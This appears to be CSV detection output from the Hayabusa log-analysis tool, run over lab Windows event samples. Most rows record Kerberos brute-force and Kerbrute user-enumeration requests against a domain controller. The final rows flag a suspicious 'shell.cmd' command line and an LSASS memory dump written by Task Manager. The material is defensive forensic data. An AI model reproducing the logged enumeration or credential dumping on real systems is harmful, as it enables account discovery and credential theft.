-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.281 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.284 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.287 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.319 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.323 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: 
::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.327 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.331 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.334 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.337 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.341 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.344 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.348 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.351 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.354 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.357 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.360 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.363 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.367 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.370 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.373 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.376 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.379 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.382 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.385 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.389 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.392 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.395 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.398 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.401 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.405 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.408 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.410 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.413 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.416 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.420 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.423 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.426 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.430 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.433 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:23.180 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-03 21:06:03.488 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.493 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.497 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.510 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.847 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:04.904 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:04.910 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:06.986 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.006 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.010 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.014 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.021 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.031 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.035 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.047 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.052 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.056 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:11.514 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:11.878 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:12.553 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-05 05:59:31.403 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx
2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
